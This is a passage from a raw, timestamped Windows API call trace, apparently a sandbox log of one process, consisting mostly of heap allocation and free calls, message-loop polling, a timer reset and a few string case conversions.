lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0086.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0086.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0086.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0086.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a60 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0086.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0086.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0086.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0086.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0086.612] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.612] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0086.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0086.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.613] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0086.669] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0086.669] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0086.669] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0086.669] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0086.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0086.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0086.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0086.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e68 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e98 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9dd8 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d30 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0086.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0086.670] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cd0 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0086.671] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0086.671] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0086.671] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0086.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0086.671] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0086.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0086.672] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0086.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0086.673] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0086.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: 